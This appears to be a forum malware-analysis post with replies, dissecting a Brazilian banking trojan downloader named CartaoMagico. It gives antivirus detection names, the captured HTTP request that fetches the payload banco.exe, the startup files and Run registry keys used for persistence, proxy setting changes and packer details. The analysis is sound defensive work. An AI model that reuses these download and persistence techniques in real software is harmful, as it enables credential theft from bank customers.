Skip navigation.

CartaoMagico Analysis



found at:
appears to be packed with PECompact2
has a microsoft word icon

AntiVir 12.27.2006 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.27.2006 no virus found
BitDefender 7.2 12.27.2006 Trojan.IM.Flooder.Delf.H
CAT-QuickHeal 8.00 12.27.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.27.2006 Trojan.Downloader.Banload-1331
DrWeb 4.33 12.27.2006 DLOADER.Trojan
eSafe 12.26.2006 Suspicious Trojan/Worm
eTrust-InoculateIT 23.73.99 12.27.2006 no virus found
eTrust-Vet 30.3.3283 12.27.2006 no virus found
Ewido 4.0 12.26.2006 Downloader.Banload.atk
Fortinet 12.27.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 12.22.2006 no virus found
Ikarus T3.1.0.27 12.27.2006 Trojan-Spy.Win32.Banker.anv
Kaspersky 12.27.2006 IM-Flooder.Win32.Delf.h
McAfee 4927 12.27.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1940 12.27.2006 a variant of Win32/TrojanDownloader.Banload.BDJ
Norman 5.80.02 12.27.2006 no virus found
Panda 12.27.2006 Suspicious file
Prevx1 V2 12.27.2006 no virus found
Sophos 4.13.0 12.26.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 12.27.2006 no virus found
UNA 1.83 12.27.2006 no virus found
VBA32 3.11.1 12.27.2006 IM-Worm.Win32.Delf.c
VirusBuster 4.3.19:9 12.27.2006 no virus found

connects to: and gets /banco.exe
OrgName: Internet Services, Inc.
Address: 1333 North Stemmons Freeway
Address: Suite 110
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

banco.exe is associated with https//
so maybe a brazilian bank hijacker.

creates processes

adds files
c:\documents and settings\all users\start menu\programs\startup\exalien.exe
c:\documents and settings\username\local settings\temporary internet files\content.ie5\randomname\banco.exe
C:\Arquivos de programas\ExAlien.exe

adds registry keys
hkey_local_machine\software\microsoft\windows\currentversion\run\ cartomagico
hkey_local_machine\software\microsoft\windows\currentversion\run\ exalien
These are kind of weird:

HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCC\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable

opens a browser window and connects to google

connects to and gets /banco.exe

GET /banco.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 1487872
Content-Type: application/octet-stream
Last-Modified: Tue, 26 Dec 2006 22:08:21 GMT
Accept-Ranges: bytes
ETag: "1a2485b3a29c71:85b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Dec 2006 22:56:32 GMT


Then for some reason it connects to the BBC:
GET /rss/newsonline_world_edition/front_page/rss.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 10 Jan 2006 06:41:43 GMT
If-None-Match: "40bf-6896d7c0"
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Wed, 27 Dec 2006 22:56:47 GMT
Server: Apache
Last-Modified: Wed, 27 Dec 2006 22:41:41 GMT
Etag: "4277-bbff3340"
Accept-Ranges: bytes
Content-Length: 17015
Cache-Control: max-age=60
Expires: Wed, 27 Dec 2006 22:57:47 GMT
Keep-Alive: timeout=10, max=52
Connection: Keep-Alive
Content-Type: application/xml


00000050 00400050 0 This program must be run under Win32
00000220 00400220 0 .rsrc
00000248 00400248 0 .mackt
00001006 00401006 0 Boolean
0000101B 0040101B 0 False
00001042 00401042 0 Integer
00001082 00401082 0 Cardinal
0000109A 0040109A 0 String
000010ED 004010ED 0 TObject
000010FA 004010FA 0 TObject
0000110C 0040110C 0 System
0000111A 0040111A 0 IInterface
0000113A 0040113A 0 System
000011E1 004011E1 0 TInterfacedObject
000011F9 004011F9 0 TDateTime
000031F0 004031F0 0 SOFTWARE\Borland\Delphi\RTL
0000320C 0040320C 0 FPUMaskValue
00005454 00405454 0 kernel32.dll
00005464 00405464 0 GetLongPathNameA
000054FD 004054FD 0 Uh}U@
000056A8 004056A8 0 Software\Borland\Locales
000056C4 004056C4 0 Software\Borland\Delphi\Locales
000057ED 004057ED 0 UhHX@
00005A2B 00405A2B 0 FFF;M
000060DA 004060DA 0 odSelected
000060E5 004060E5 0 odGrayed
000060EE 004060EE 0 odDisabled odChecked odFocused odDefault
00006117 00406117 0 odHotLight
00006122 00406122 0 odInactive odNoAccel
00006137 00406137 0 odNoFocusRect
00006145 00406145 0 odReserved1
00006151 00406151 0 odReserved2

there are a TON of strings so i didnt include them all but here are some more good ones:


more later,



It looks like it's actually packed with PECompact2. That being the case UnPECompact won't work against it. I know there are supposed to be some OllyDbg scripts out there that will unpack it, but I don't know the URL. Anyone got a link to it/them?


I didnt have much trouble

I didnt have much trouble dynamically unpacking it, however a first stop site for RE tools, scripts, and information is Pedram's OpenRCE. I highly recommend it, Pedram really knows what hes doing. I also recommend his and Ero's RE malware class at blackhat if you can afford it.

Here is a link to the ollyscripts.



A tipical brazilian

A tipical brazilian banker.
We develop a tool to remove this kind of malware, very common in Brazil, see:

Fabio Assolini
Security Coordenator


Thanks alot for the response. Thats very useful information.

Please feel free to contribute any time.